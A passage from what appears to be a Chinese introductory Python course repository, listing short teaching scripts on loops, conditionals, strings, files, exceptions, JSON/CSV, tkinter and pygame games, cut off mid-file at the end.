请注意通过threading.Thread创建的线程默认是非守护线程 File: Day01-15/code/Day04/for2.py """ 用for循环实现1~100之间的偶数求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum = 0 for x in range(2, 101, 2): sum += x print(sum) File: Day01-15/code/Day04/for6.py """ 打印各种三角形图案 * ** *** **** ***** * ** *** **** ***** * *** ***** ******* ********* Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ row = int(input('请输入行数: ')) for i in range(row): for _ in range(i + 1): print('*', end='') print() for i in range(row): for j in range(row): if j < row - i - 1: print(' ', end='') else: print('*', end='') print() for i in range(row): for _ in range(row - i - 1): print(' ', end='') for _ in range(2 * i + 1): print('*', end='') print() File: Day01-15/code/Day04/while1.py """ 用while循环实现1~100求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum = 0 num = 1 while num <= 100: sum += num num += 1 print(sum) File: Day01-15/code/Day04/for3.py """ 输入非负整数n计算n! Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ n = int(input('n = ')) result = 1 for x in range(1, n + 1): result *= x print('%d! = %d' % (n, result)) File: Day01-15/code/Day04/while2.py """ 用while循环实现1~100之间的偶数求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum, num = 0, 2 while num <= 100: sum += num num += 2 print(sum) File: Day01-15/code/Day04/for4.py """ 输入一个正整数判断它是不是素数 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ from math import sqrt num = int(input('请输入一个正整数: ')) end = int(sqrt(num)) is_prime = True for x in range(2, end + 1): if num % x == 0: is_prime = False break if is_prime and num != 1: print('%d是素数' % num) else: print('%d不是素数' % num) File: Day01-15/code/Day04/for1.py """ 用for循环实现1~100求和 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ sum = 0 for x in range(1, 101): sum += x print(sum) File: Day01-15/code/Day04/for5.py """ 输入两个正整数计算最大公约数和最小公倍数 Version: 0.1 Author: 骆昊 Date: 2018-03-01 """ x = int(input('x = ')) y = int(input('y = ')) if x > y: (x, y) = (y, x) for factor in range(x, 0, -1): if x % factor == 0 and y % factor == 0: print('%d和%d的最大公约数是%d' % (x, y, factor)) print('%d和%d的最小公倍数是%d' % (x, y, x * y // factor)) break File: Day01-15/code/Day03/tax.py """ 输入月收入和五险一金计算个人所得税 说明:写这段代码时新的个人所得税计算方式还没有颁布 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ salary = float(input('本月收入: ')) insurance = float(input('五险一金: ')) diff = salary - insurance - 3500 if diff <= 0: rate = 0 deduction = 0 elif diff < 1500: rate = 0.03 deduction = 0 elif diff < 4500: rate = 0.1 deduction = 105 elif diff < 9000: rate = 0.2 deduction = 555 elif diff < 35000: rate = 0.25 deduction = 1005 elif diff < 55000: rate = 0.3 deduction = 2755 elif diff < 80000: rate = 0.35 deduction = 5505 else: rate = 0.45 deduction = 13505 tax = abs(diff * rate - deduction) print('个人所得税: ¥%.2f元' % tax) print('实际到手收入: ¥%.2f元' % (diff + 3500 - tax)) File: Day01-15/code/Day03/conversion.py """ 英制单位英寸和公制单位厘米互换 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ value = float(input('请输入长度: ')) unit = input('请输入单位: ') if unit == 'in' or unit == '英寸': print('%f英寸 = %f厘米' % (value, value * 2.54)) elif unit == 'cm' or unit == '厘米': print('%f厘米 = %f英寸' % (value, value / 2.54)) else: print('请输入有效的单位') File: Day01-15/code/Day03/rolldice.py """ 掷骰子决定做什么事情 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ from random import randint face = randint(1, 6) if face == 1: result = '唱首歌' elif face == 2: result = '跳个舞' elif face == 3: result = '学狗叫' elif face == 4: result = '做俯卧撑' elif face == 5: result = '念绕口令' else: result = '讲冷笑话' print(result) File: Day01-15/code/Day03/triangle.py """ 判断输入的边长能否构成三角形 如果能则计算出三角形的周长和面积 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ import math a = float(input('a = ')) b = float(input('b = ')) c = float(input('c = ')) if a + b > c and a + c > b and b + c > a: print('周长: %f' % (a + b + c)) p = (a + b + c) / 2 area = math.sqrt(p * (p - a) * (p - b) * (p - c)) print('面积: %f' % (area)) else: print('不能构成三角形') File: Day01-15/code/Day03/verify.py """ 用户身份验证 Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ # import getpass # from getpass import getpass # from getpass import * username = input('请输入用户名: ') password = input('请输入口令: ') # 输入口令的时候终端中没有回显 # password = getpass.getpass('请输入口令: ') if username == 'admin' and password == '123456': print('身份验证成功!') else: print('身份验证失败!') File: Day01-15/code/Day03/piecewise.py """ 分段函数求值 3x - 5 (x > 1) f(x) = x + 2 (-1 <= x <= 1) 5x + 3 (x < -1) Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ x = float(input('x = ')) if x > 1: y = 3 * x - 5 elif x >= -1: y = x + 2 else: y = 5 * x + 3 print('f(%.2f) = %.2f' % (x, y)) File: Day01-15/code/Day03/grade.py """ 百分制成绩转等级制成绩 90分以上,输出A 80分~89分,输出B 70分~79分,输出C 60分~69分,输出D 60分以下,输出E Version: 0.1 Author: 骆昊 Date: 2018-02-28 """ score = float(input('请输入成绩: ')) if score >= 90: grade = 'A' elif score >= 80: grade = 'B' elif score >= 70: grade = 'C' elif score >= 60: grade = 'D' else: grade = 'E' print('对应的等级是:', grade) File: Day01-15/code/Day02/variable2.py """ 将input函数输入的数据保存在变量中并进行操作 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = int(input('a = ')) b = int(input('b = ')) print(a + b) print(a - b) print(a * b) print(a / b) print(a // b) print(a % b) print(a ** b) File: Day01-15/code/Day02/leap.py """ 输入年份 如果是闰年输出True 否则输出False Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ year = int(input('请输入年份: ')) # 如果代码太长写成一行不便于阅读 可以使用\或()折行 is_leap = (year % 4 == 0 and year % 100 != 0 or year % 400 == 0) print(is_leap) File: Day01-15/code/Day02/variable3.py """ 格式化输出 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = int(input('a = ')) b = int(input('b = ')) print('%d + %d = %d' % (a, b, a + b)) print('%d - %d = %d' % (a, b, a - b)) print('%d * %d = %d' % (a, b, a * b)) print('%d / %d = %f' % (a, b, a / b)) print('%d // %d = %d' % (a, b, a // b)) print('%d %% %d = %d' % (a, b, a % b)) print('%d ** %d = %d' % (a, b, a ** b)) File: Day01-15/code/Day02/circle.py """ 输入半径计算圆的周长和面积 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ import math radius = float(input('请输入圆的半径: ')) perimeter = 2 * math.pi * radius area = math.pi * radius * radius print('周长: %.2f' % perimeter) print('面积: %.2f' % area) File: Day01-15/code/Day02/operator.py """ 运算符的使用 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 5 b = 10 c = 3 d = 4 e = 5 a += b a -= c a *= d a /= e print("a = ", a) flag1 = 3 > 2 flag2 = 2 < 1 flag3 = flag1 and flag2 flag4 = flag1 or flag2 flag5 = not flag1 print("flag1 = ", flag1) print("flag2 = ", flag2) print("flag3 = ", flag3) print("flag4 = ", flag4) print("flag5 = ", flag5) print(flag1 is True) print(flag2 is not False) File: Day01-15/code/Day02/centigrade.py """ 将华氏温度转换为摄氏温度 F = 1.8C + 32 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ f = float(input('请输入华氏温度: ')) c = (f - 32) / 1.8 print('%.1f华氏度 = %.1f摄氏度' % (f, c)) File: Day01-15/code/Day02/variable4.py """ 检查变量的类型 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 100 b = 1000000000000000000 c = 12.345 d = 1 + 5j e = 'A' f = 'hello, world' g = True print(type(a)) print(type(b)) print(type(c)) print(type(d)) print(type(e)) print(type(f)) print(type(g)) File: Day01-15/code/Day02/variable5.py """ 类型转换 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 100 b = str(a) c = 12.345 d = str(c) e = '123' f = int(e) g = '123.456' h = float(g) i = False j = str(i) k = 'hello' m = bool(k) print(a) print(type(a)) print(b) print(type(b)) print(c) print(type(c)) print(d) print(type(d)) print(e) print(type(e)) print(f) print(type(f)) print(g) print(type(g)) print(h) print(type(h)) print(i) print(type(i)) print(j) print(type(j)) print(k) print(type(k)) print(m) print(type(m)) File: Day01-15/code/Day02/strings.py """ 字符串常用操作 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ str1 = 'hello, world!' print('字符串的长度是:', len(str1)) print('单词首字母大写: ', str1.title()) print('字符串变大写: ', str1.upper()) # str1 = str1.upper() print('字符串是不是大写: ', str1.isupper()) print('字符串是不是以hello开头: ', str1.startswith('hello')) print('字符串是不是以hello结尾: ', str1.endswith('hello')) print('字符串是不是以感叹号开头: ', str1.startswith('!')) print('字符串是不是一感叹号结尾: ', str1.endswith('!')) str2 = '- \u9a86\u660a' str3 = str1.title() + ' ' + str2.lower() print(str3) File: Day01-15/code/Day02/variable1.py """ 使用变量保存数据并进行操作 Version: 0.1 Author: 骆昊 Date: 2018-02-27 """ a = 321 b = 123 print(a + b) print(a - b) print(a * b) print(a / b) print(a // b) print(a % b) print(a ** b) File: Day01-15/code/Day05/prime.py """ 输出2~99之间的素数 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ import math for num in range(2, 100): is_prime = True for factor in range(2, int(math.sqrt(num)) + 1): if num % factor == 0: is_prime = False break if is_prime: print(num, end=' ') File: Day01-15/code/Day05/palindrome.py """ 判断输入的正整数是不是回文数 回文数是指将一个正整数从左往右排列和从右往左排列值一样的数 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ num = int(input('请输入一个正整数: ')) temp = num num2 = 0 while temp > 0: num2 *= 10 num2 += temp % 10 temp //= 10 if num == num2: print('%d是回文数' % num) else: print('%d不是回文数' % num) File: Day01-15/code/Day05/guess.py """ 猜数字游戏 计算机出一个1~100之间的随机数由人来猜 计算机根据人猜的数字分别给出提示大一点/小一点/猜对了 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ import random answer = random.randint(1, 100) counter = 0 while True: counter += 1 number = int(input('请输入: ')) if number < answer: print('大一点') elif number > answer: print('小一点') else: print('恭喜你猜对了!') break print('你总共猜了%d次' % counter) if counter > 7: print('你的智商余额明显不足') File: Day01-15/code/Day05/lily.py """ 找出100~999之间的所有水仙花数 水仙花数是各位立方和等于这个数本身的数 如: 153 = 1**3 + 5**3 + 3**3 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ for num in range(100, 1000): low = num % 10 mid = num // 10 % 10 high = num // 100 if num == low ** 3 + mid ** 3 + high ** 3: print(num) File: Day01-15/code/Day05/perfect.py """ 找出1~9999之间的所有完美数 完美数是除自身外其他所有因子的和正好等于这个数本身的数 例如: 6 = 1 + 2 + 3, 28 = 1 + 2 + 4 + 7 + 14 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ import math for num in range(2, 10000): result = 0 for factor in range(1, int(math.sqrt(num)) + 1): if num % factor == 0: result += factor if factor > 1 and num // factor != factor: result += num // factor if result == num: print(num) File: Day01-15/code/Day05/table.py """ 输出乘法口诀表(九九表) Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ for i in range(1, 10): for j in range(1, i + 1): print('%d*%d=%d' % (i, j, i * j), end='\t') print() File: Day01-15/code/Day05/craps.py """ Craps赌博游戏 玩家摇两颗色子 如果第一次摇出7点或11点 玩家胜 如果摇出2点 3点 12点 庄家胜 其他情况游戏继续 玩家再次要色子 如果摇出7点 庄家胜 如果摇出第一次摇的点数 玩家胜 否则游戏继续 玩家继续摇色子 玩家进入游戏时有1000元的赌注 全部输光游戏结束 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ from random import randint money = 1000 while money > 0: print('你的总资产为:', money) needs_go_on = False while True: debt = int(input('请下注: ')) if 0 < debt <= money: break first = randint(1, 6) + randint(1, 6) print('玩家摇出了%d点' % first) if first == 7 or first == 11: print('玩家胜!') money += debt elif first == 2 or first == 3 or first == 12: print('庄家胜!') money -= debt else: needs_go_on = True while needs_go_on: current = randint(1, 6) + randint(1, 6) print('玩家摇出了%d点' % current) if current == 7: print('庄家胜') money -= debt needs_go_on = False elif current == first: print('玩家胜') money += debt needs_go_on = False print('你破产了, 游戏结束!') File: Day01-15/code/Day05/chicken.py """ 求解《百钱百鸡》问题 1只公鸡5元 1只母鸡3元 3只小鸡1元 用100元买100只鸡 问公鸡 母鸡 小鸡各有多少只 Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ for x in range(0, 20): for y in range(0, 33): z = 100 - x - y if 5 * x + 3 * y + z / 3 == 100: print('公鸡: %d只, 母鸡: %d只, 小鸡: %d只' % (x, y, z)) File: Day01-15/code/Day05/fibonacci.py """ 输出斐波那契数列的前20个数 1 1 2 3 5 8 13 21 ... Version: 0.1 Author: 骆昊 Date: 2018-03-02 """ a = 0 b = 1 for _ in range(20): a, b = b, a + b print(a, end=' ') File: Day01-15/code/Day11/csv1.py """ 读取CSV文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import csv filename = 'example.csv' try: with open(filename) as f: reader = csv.reader(f) data = list(reader) except FileNotFoundError: print('无法打开文件:', filename) else: for item in data: print('%-30s%-20s%-10s' % (item[0], item[1], item[2])) File: Day01-15/code/Day11/json2.py """ 写入JSON文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import json teacher_dict = {'name': '白元芳', 'age': 25, 'title': '讲师'} json_str = json.dumps(teacher_dict) print(json_str) print(type(json_str)) fruits_list = ['apple', 'orange', 'strawberry', 'banana', 'pitaya'] json_str = json.dumps(fruits_list) print(json_str) print(type(json_str)) File: Day01-15/code/Day11/file2.py """ 读取圆周率文件判断其中是否包含自己的生日 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ birth = input('请输入你的生日: ') with open('pi_million_digits.txt') as f: lines = f.readlines() pi_string = '' for line in lines: pi_string += line.strip() if birth in pi_string: print('Bingo!!!') File: Day01-15/code/Day11/ex2.py """ 异常机制 - 处理程序在运行时可能发生的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ input_again = True while input_again: try: a = int(input('a = ')) b = int(input('b = ')) print('%d / %d = %f' % (a, b, a / b)) input_again = False except (ValueError, ZeroDivisionError) as msg: print(msg) File: Day01-15/code/Day11/ex3.py """ 异常机制 - 处理程序在运行时可能发生的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import time import sys filename = input('请输入文件名: ') try: with open(filename) as f: lines = f.readlines() except FileNotFoundError as msg: print('无法打开文件:', filename) print(msg) except UnicodeDecodeError as msg: print('非文本文件无法解码') sys.exit() else: for line in lines: print(line.rstrip()) time.sleep(0.5) finally: # 此处最适合做善后工作 print('不管发生什么我都会执行') File: Day01-15/code/Day11/file3.py """ 写文本文件 将100以内的素数写入到文件中 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ from math import sqrt def is_prime(n): for factor in range(2, int(sqrt(n)) + 1): if n % factor == 0: return False return True # 试一试有什么不一样 # with open('prime.txt', 'a') as f: with open('prime.txt', 'w') as f: for num in range(2, 100): if is_prime(num): f.write(str(num) + '\n') print('写入完成!') File: Day01-15/code/Day11/file4.py """ 读写二进制文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import base64 with open('mm.jpg', 'rb') as f: data = f.read() # print(type(data)) # print(data) print('字节数:', len(data)) # 将图片处理成BASE-64编码 print(base64.b64encode(data)) with open('girl.jpg', 'wb') as f: f.write(data) print('写入完成!') File: Day01-15/code/Day11/ex4.py """ 引发异常和异常栈 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ def f1(): raise AssertionError('发生异常') def f2(): f1() def f3(): f2() f3() File: Day01-15/code/Day11/file1.py """ 从文本文件中读取数据 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import time def main(): # 一次性读取整个文件内容 with open('致橡树.txt', 'r', encoding='utf-8') as f: print(f.read()) # 通过for-in循环逐行读取 with open('致橡树.txt', mode='r') as f: for line in f: print(line, end='') time.sleep(0.5) print() # 读取文件按行读取到列表中 with open('致橡树.txt') as f: lines = f.readlines() print(lines) if __name__ == '__main__': main() File: Day01-15/code/Day11/ex1.py """ 异常机制 - 处理程序在运行时可能发生的状态 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ input_again = True while input_again: try: a = int(input('a = ')) b = int(input('b = ')) print('%d / %d = %f' % (a, b, a / b)) input_again = False except ValueError: print('请输入整数') except ZeroDivisionError: print('除数不能为0') # 处理异常让代码不因异常而崩溃是一方面 # 更重要的是可以通过对异常的处理让代码从异常中恢复过来 File: Day01-15/code/Day11/json1.py """ 读取JSON数据 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import json import csv2 json_str = '{"name": "骆昊", "age": 38, "title": "叫兽"}' result = json.loads(json_str) print(result) print(type(result)) print(result['name']) print(result['age']) # 把转换得到的字典作为关键字参数传入Teacher的构造器 teacher = csv2.Teacher(**result) print(teacher) print(teacher.name) print(teacher.age) print(teacher.title) # 请思考如何将下面JSON格式的天气数据转换成对象并获取我们需要的信息 # 稍后我们会讲解如何通过网络API获取我们需要的JSON格式的数据 """ { "wendu": "29", "ganmao": "各项气象条件适宜,发生感冒机率较低。但请避免长期处于空调房间中,以防感冒。", "forecast": [ { "fengxiang": "南风", "fengli": "3-4级", "high": "高温 32℃", "type": "多云", "low": "低温 17℃", "date": "16日星期二" }, { "fengxiang": "南风", "fengli": "微风级", "high": "高温 34℃", "type": "晴", "low": "低温 19℃", "date": "17日星期三" }, { "fengxiang": "南风", "fengli": "微风级", "high": "高温 35℃", "type": "晴", "low": "低温 22℃", "date": "18日星期四" }, { "fengxiang": "南风", "fengli": "微风级", "high": "高温 35℃", "type": "多云", "low": "低温 22℃", "date": "19日星期五" }, { "fengxiang": "南风", "fengli": "3-4级", "high": "高温 34℃", "type": "晴", "low": "低温 21℃", "date": "20日星期六" } ], "yesterday": { "fl": "微风", "fx": "南风", "high": "高温 28℃", "type": "晴", "low": "低温 15℃", "date": "15日星期一" }, "aqi": "72", "city": "北京" } """ File: Day01-15/code/Day11/csv2.py """ 写入CSV文件 Version: 0.1 Author: 骆昊 Date: 2018-03-13 """ import csv class Teacher(object): def __init__(self, name, age, title): self.__name = name self.__age = age self.__title = title self.__index = -1 @property def name(self): return self.__name @property def age(self): return self.__age @property def title(self): return self.__title filename = 'teacher.csv' teachers = [Teacher('骆昊', 38, '叫兽'), Teacher('狄仁杰', 25, '砖家')] try: with open(filename, 'w') as f: writer = csv.writer(f) for teacher in teachers: writer.writerow([teacher.name, teacher.age, teacher.title]) except BaseException as e: print('无法写入文件:', filename) else: print('保存数据完成!') File: Day01-15/code/Day10/renju.py import pygame EMPTY = 0 BLACK = 1 WHITE = 2 black_color = [0, 0, 0] white_color = [255, 255, 255] class RenjuBoard(object): def __init__(self): self._board = [[]] * 15 self.reset() def reset(self): for row in range(len(self._board)): self._board[row] = [EMPTY] * 15 def move(self, row, col, is_black): if self._board[row][col] == EMPTY: self._board[row][col] = BLACK if is_black else WHITE return True return False def draw(self, screen): for index in range(1, 16): pygame.draw.line(screen, black_color, [40, 40 * index], [600, 40 * index], 1) pygame.draw.line(screen, black_color, [40 * index, 40], [40 * index, 600], 1) pygame.draw.rect(screen, black_color, [36, 36, 568, 568], 4) pygame.draw.circle(screen, black_color, [320, 320], 5, 0) pygame.draw.circle(screen, black_color, [160, 160], 5, 0) pygame.draw.circle(screen, black_color, [480, 480], 5, 0) pygame.draw.circle(screen, black_color, [480, 160], 5, 0) pygame.draw.circle(screen, black_color, [160, 480], 5, 0) for row in range(len(self._board)): for col in range(len(self._board[row])): if self._board[row][col] != EMPTY: ccolor = black_color \ if self._board[row][col] == BLACK else white_color pos = [40 * (col + 1), 40 * (row + 1)] pygame.draw.circle(screen, ccolor, pos, 20, 0) def main(): board = RenjuBoard() is_black = True pygame.init() pygame.display.set_caption('五子棋') screen = pygame.display.set_mode([640, 640]) screen.fill([255, 255, 0]) board.draw(screen) pygame.display.flip() running = True while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False elif event.type == pygame.KEYUP: pass elif event.type == pygame.MOUSEBUTTONDOWN\ and event.button == 1: x, y = event.pos row = round((y - 40) / 40) col = round((x - 40) / 40) if board.move(row, col, is_black): is_black = not is_black screen.fill([255, 255, 0]) board.draw(screen) pygame.display.flip() pygame.quit() if __name__ == '__main__': main() File: Day01-15/code/Day10/gui2.py """ 使用tkinter创建GUI - 使用画布绘图 - 处理鼠标事件 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import tkinter def mouse_evt_handler(evt=None): row = round((evt.y - 20) / 40) col = round((evt.x - 20) / 40) pos_x = 40 * col pos_y = 40 * row canvas.create_oval(pos_x, pos_y, 40 + pos_x, 40 + pos_y, fill='black') top = tkinter.Tk() # 设置窗口尺寸 top.geometry('620x620') # 设置窗口标题 top.title('五子棋') # 设置窗口大小不可改变 top.resizable(False, False) # 设置窗口置顶 top.wm_attributes('-topmost', 1) canvas = tkinter.Canvas(top, width=600, height=600, bd=0, highlightthickness=0) canvas.bind('<Button-1>', mouse_evt_handler) canvas.create_rectangle(0, 0, 600, 600, fill='yellow', outline='white') for index in range(15): canvas.create_line(20, 20 + 40 * index, 580, 20 + 40 * index, fill='black') canvas.create_line(20 + 40 * index, 20, 20 + 40 * index, 580, fill='black') canvas.create_rectangle(15, 15, 585, 585, outline='black', width=4) canvas.pack() tkinter.mainloop() # 请思考如何用面向对象的编程思想对上面的代码进行封装 File: Day01-15/code/Day10/snake.py from abc import ABCMeta, abstractmethod from enum import Enum, unique from random import randrange from threading import Thread import pygame class Color(object): """颜色""" GRAY = (242, 242, 242) BLACK = (0, 0, 0) GREEN = (0, 255, 0) PINK = (255, 20, 147) @unique class Direction(Enum): """方向""" UP = 0 RIGHT = 1 DOWN = 2 LEFT = 3 class GameObject(object, metaclass=ABCMeta): """游戏中的对象""" def __init__(self, x=0, y=0, color=Color.BLACK): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param color: 颜色 """ self._x = x self._y = y self._color = color @property def x(self): return self._x @property def y(self): return self._y @abstractmethod def draw(self, screen): """ 绘制 :param screen: 屏幕 """ pass class Wall(GameObject): """围墙""" def __init__(self, x, y, width, height, color=Color.BLACK): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param width: 宽度 :param height: 高度 :param color: 颜色 """ super().__init__(x, y, color) self._width = width self._height = height @property def width(self): return self._width @property def height(self): return self._height def draw(self, screen): pygame.draw.rect(screen, self._color, (self._x, self._y, self._width, self._height), 4) class Food(GameObject): """食物""" def __init__(self, x, y, size, color=Color.PINK): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param size: 大小 :param color: 颜色 """ super().__init__(x, y, color) self._size = size self._hidden = False def draw(self, screen): if not self._hidden: pygame.draw.circle(screen, self._color, (self._x + self._size // 2, self._y + self._size // 2), self._size // 2, 0) self._hidden = not self._hidden class SnakeNode(GameObject): """蛇身上的节点""" def __init__(self, x, y, size, color=Color.GREEN): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param size: 大小 :param color: 颜色 """ super().__init__(x, y, color) self._size = size @property def size(self): return self._size def draw(self, screen): pygame.draw.rect(screen, self._color, (self._x, self._y, self._size, self._size), 0) pygame.draw.rect(screen, Color.BLACK, (self._x, self._y, self._size, self._size), 1) class Snake(GameObject): """蛇""" def __init__(self, x, y, size=20, length=5): """ 初始化方法 :param x: 横坐标 :param y: 纵坐标 :param size: 大小 :param length: 初始长度 """ super().__init__() self._dir = Direction.LEFT self._nodes = [] self._alive = True self._new_dir = None for index in range(length): node = SnakeNode(x + index * size, y, size) self._nodes.append(node) @property def dir(self): return self._dir @property def alive(self): return self._alive @property def head(self): return self._nodes[0] def change_dir(self, new_dir): """ 改变方向 :param new_dir: 新方向 """ if new_dir != self._dir and \ (self._dir.value + new_dir.value) % 2 != 0: self._new_dir = new_dir def move(self): """移动""" if self._new_dir: self._dir, self._new_dir = self._new_dir, None snake_dir = self._dir x, y, size = self.head.x, self.head.y, self.head.size if snake_dir == Direction.UP: y -= size elif snake_dir == Direction.RIGHT: x += size elif snake_dir == Direction.DOWN: y += size else: x -= size new_head = SnakeNode(x, y, size) self._nodes.insert(0, new_head) self._nodes.pop() def collide(self, wall): """ 撞墙 :param wall: 围墙 """ head = self.head if head.x < wall.x or head.x + head.size > wall.x + wall.width \ or head.y < wall.y or head.y + head.size > wall.y + wall.height: self._alive = False def eat_food(self, food): """ 吃食物 :param food: 食物 :return: 吃到食物返回True否则返回False """ if self.head.x == food.x and self.head.y == food.y: tail = self._nodes[-1] self._nodes.append(tail) return True return False def eat_self(self): """咬自己""" for index in range(4, len(self._nodes)): node = self._nodes[index] if node.x == self.head.x and node.y == self.head.y: self._alive = False def draw(self, screen): for node in self._nodes: node.draw(screen) def main(): def refresh(): """刷新游戏窗口""" screen.fill(Color.GRAY) wall.draw(screen) food.draw(screen) snake.draw(screen) pygame.display.flip() def handle_key_event(key_event): """处理按键事件""" key = key_event.key if key == pygame.K_F2: reset_game() elif key in (pygame.K_a, pygame.K_w, pygame.K_d, pygame.K_s): if snake.alive: if key == pygame.K_w: new_dir = Direction.UP elif key == pygame.K_d: new_dir = Direction.RIGHT elif key == pygame.K_s: new_dir = Direction.DOWN else: new_dir = Direction.LEFT snake.change_dir(new_dir) def create_food(): """创建食物""" unit_size = snake.head.size max_row = wall.height // unit_size max_col = wall.width // unit_size row = randrange(0, max_row) col = randrange(0, max_col) return Food(wall.x + unit_size * col, wall.y + unit_size * row, unit_size) def reset_game(): """重置游戏""" nonlocal food, snake food = create_food() snake = Snake(250, 290) def background_task(): nonlocal running, food while running: if snake.alive: refresh() clock.tick(10) if snake.alive: snake.move() snake.collide(wall) if snake.eat_food(food): food = create_food() snake.eat_self() """ class BackgroundTask(Thread): def run(self): nonlocal running, food while running: if snake.alive: refresh() clock.tick(10) if snake.alive: snake.move() snake.collide(wall) if snake.eat_food(food): food = create_food() snake.eat_self() """ wall = Wall(10, 10, 600, 600) snake = Snake(250, 290) food = create_food() pygame.init() screen = pygame.display.set_mode((620, 620)) pygame.display.set_caption('贪吃蛇') # 创建控制游戏每秒帧数的时钟 clock = pygame.time.Clock() running = True # 启动后台线程负责刷新窗口和让蛇移动 # BackgroundTask().start() Thread(target=background_task).start() # 处理事件的消息循环 while running: for event in pygame.event.get(): if event.type == pygame.QUIT: running = False elif event.type == pygame.KEYDOWN: handle_key_event(event) pygame.quit() if __name__ == '__main__': main() File: Day01-15/code/Day10/gui3.py """ 使用tkinter创建GUI - 在窗口上制作动画 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import tkinter import time # 播放动画效果的函数 def play_animation(): canvas.move(oval, 2, 2) canvas.update() top.after(50, play_animation) x = 10 y = 10 top = tkinter.Tk() top.geometry('600x600') top.title('动画效果') top.resizable(False, False) top.wm_attributes('-topmost', 1) canvas = tkinter.Canvas(top, width=600, height=600, bd=0, highlightthickness=0) canvas.create_rectangle(0, 0, 600, 600, fill='gray') oval = canvas.create_oval(10, 10, 60, 60, fill='red') canvas.pack() top.update() play_animation() tkinter.mainloop() # 请思考如何让小球碰到屏幕的边界就弹回 # 请思考如何用面向对象的编程思想对上面的代码进行封装 File: Day01-15/code/Day10/ball.py from enum import Enum, unique from math import sqrt from random import randint import pygame @unique class Color(Enum): """颜色""" RED = (255, 0, 0) GREEN = (0, 255, 0) BLUE = (0, 0, 255) BLACK = (0, 0, 0) WHITE = (255, 255, 255) GRAY = (242, 242, 242) @staticmethod def random_color(): """获得随机颜色""" r = randint(0, 255) g = randint(0, 255) b = randint(0, 255) return (r, g, b) class Ball(object): """球""" def __init__(self, x, y, radius, sx, sy, color=Color.RED): """初始化方法""" self.x = x self.y = y self.radius = radius self.sx = sx self.sy = sy self.color = color self.alive = True def move(self, screen): """移动""" self.x += self.sx self.y += self.sy if self.x - self.radius <= 0 or self.x + self.radius >= screen.get_width(): self.sx = -self.sx if self.y - self.radius <= 0 or self.y + self.radius >= screen.get_height(): self.sy = -self.sy def eat(self, other): """吃其他球""" if self.alive and other.alive and self != other: dx, dy = self.x - other.x, self.y - other.y distance = sqrt(dx ** 2 + dy ** 2) if distance < self.radius + other.radius \ and self.radius > other.radius: other.alive = False self.radius = self.radius + int(other.radius * 0.146) def draw(self, screen): """在窗口上绘制球""" pygame.draw.circle(screen, self.color, (self.x, self.y), self.radius, 0) def main(): # 定义用来装所有球的容器 balls = [] # 初始化导入的pygame中的模块 pygame.init() # 初始化用于显示的窗口并设置窗口尺寸 screen = pygame.display.set_mode((800, 600)) print(screen.get_width()) print(screen.get_height()) # 设置当前窗口的标题 pygame.display.set_caption('大球吃小球') # 定义变量来表示小球在屏幕上的位置 x, y = 50, 50 running = True # 开启一个事件循环处理发生的事件 while running: # 从消息队列中获取事件并对事件进行处理 for event in pygame.event.get(): if event.type == pygame.QUIT: running = False if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1: x, y = event.pos radius = randint(10, 100) sx, sy = randint(-10, 10), randint(-10, 10) color = Color.random_color() ball = Ball(x, y, radius, sx, sy, color) balls.append(ball) screen.fill((255, 255, 255)) for ball in balls: if ball.alive: ball.draw(screen) else: balls.remove(ball) pygame.display.flip() # 每隔50毫秒就改变小球的位置再刷新窗口 pygame.time.delay(50) for ball in balls: ball.move(screen) for other in balls: ball.eat(other) if __name__ == '__main__': main() File: Day01-15/code/Day10/gui1.py """ 使用tkinter创建GUI - 顶层窗口 - 控件 - 布局 - 事件回调 Version: 0.1 Author: 骆昊 Date: 2018-03-14 """ import tkinter import tkinter.messagebox def main(): flag = True # 修改标签上的文字 def change_label_text(): nonlocal flag flag = not flag color, msg = ('red', 'Hello, world!')\ if flag else ('blue', 'Goodbye, world!') 